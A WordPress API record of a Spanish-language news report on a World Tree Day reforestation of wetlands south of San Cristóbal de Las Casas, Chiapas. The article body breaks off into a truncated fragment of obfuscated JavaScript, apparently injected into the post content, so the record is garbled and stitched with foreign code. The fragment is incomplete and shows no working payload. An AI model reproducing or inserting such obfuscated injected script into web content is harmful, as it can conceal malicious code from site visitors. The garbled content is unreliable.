{"id":22744,"date":"2025-06-30T04:51:59","date_gmt":"2025-06-30T04:51:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22744"},"modified":"2025-06-30T04:52:00","modified_gmt":"2025-06-30T04:52:00","slug":"reforestan-humedales-del-sur-de-san-cristobal-en-el-dia-mundial-del-arbol","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22744","title":{"rendered":"Reforestan humedales del sur de San Crist\u00f3bal en el D\u00eda Mundial del \u00c1rbol"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"702\" data-id=\"22746\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000196751-1024x702.jpg\" alt=\"\" class=\"wp-image-22746\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000196751-1024x702.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000196751-300x206.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000196751-768x526.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000196751-110x75.jpg 110w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000196751.jpg 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"22747\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000196752-1024x768.jpg\" alt=\"\" class=\"wp-image-22747\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000196752-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000196752-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000196752-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000196752-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000196752.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 29 de junio de 2025.- En el marco del D\u00eda Mundial del \u00c1rbol, el Consejo de la Zona Sur y de los Humedales realiz\u00f3 una jornada de reforestaci\u00f3n en la colonia Anexo Altos de Mar\u00eda Auxiliadora, al sur de San Crist\u00f3bal de Las Casas, donde se plantaron cientos de \u00e1rboles nativos en zonas estrat\u00e9gicas para la restauraci\u00f3n de suelos, el manejo de cuencas y la protecci\u00f3n de los humedales, considerados como \u201cbosques de agua\u201d del Valle de Jovel.<\/p>\n\n\n\n<p>En un comunicado el Consejo reiter\u00f3 su compromiso con la reforestaci\u00f3n sostenible, la protecci\u00f3n de los humedales y la educaci\u00f3n ambiental comunitaria. Ni\u00f1as, ni\u00f1os, familias completas, activistas, organizaciones civiles y vecinos se unieron en esta jornada que busc\u00f3 m\u00e1s que plantar \u00e1rboles: sembrar conciencia. \u201cCada \u00e1rbol cuenta, cada acci\u00f3n suma\u201d, se\u00f1alaron los Guardianes y Guardianas de los Humedales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal San Crist\u00f3bal de Las Casas, 29 de junio de 2025.- En el marco del D\u00eda Mundial del \u00c1rbol, el Consejo de la Zona Sur y de los Humedales realiz\u00f3 una jornada de reforestaci\u00f3n en la colonia Anexo Altos de Mar\u00eda Auxiliadora, al sur de San Crist\u00f3bal de Las Casas, donde se plantaron &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22746,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22744","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22744","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22744"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22744\/revisions"}],"predecessor-version":[{"id":22748,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22744\/revisions\/22748"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22746"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22744"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22744"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22744"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}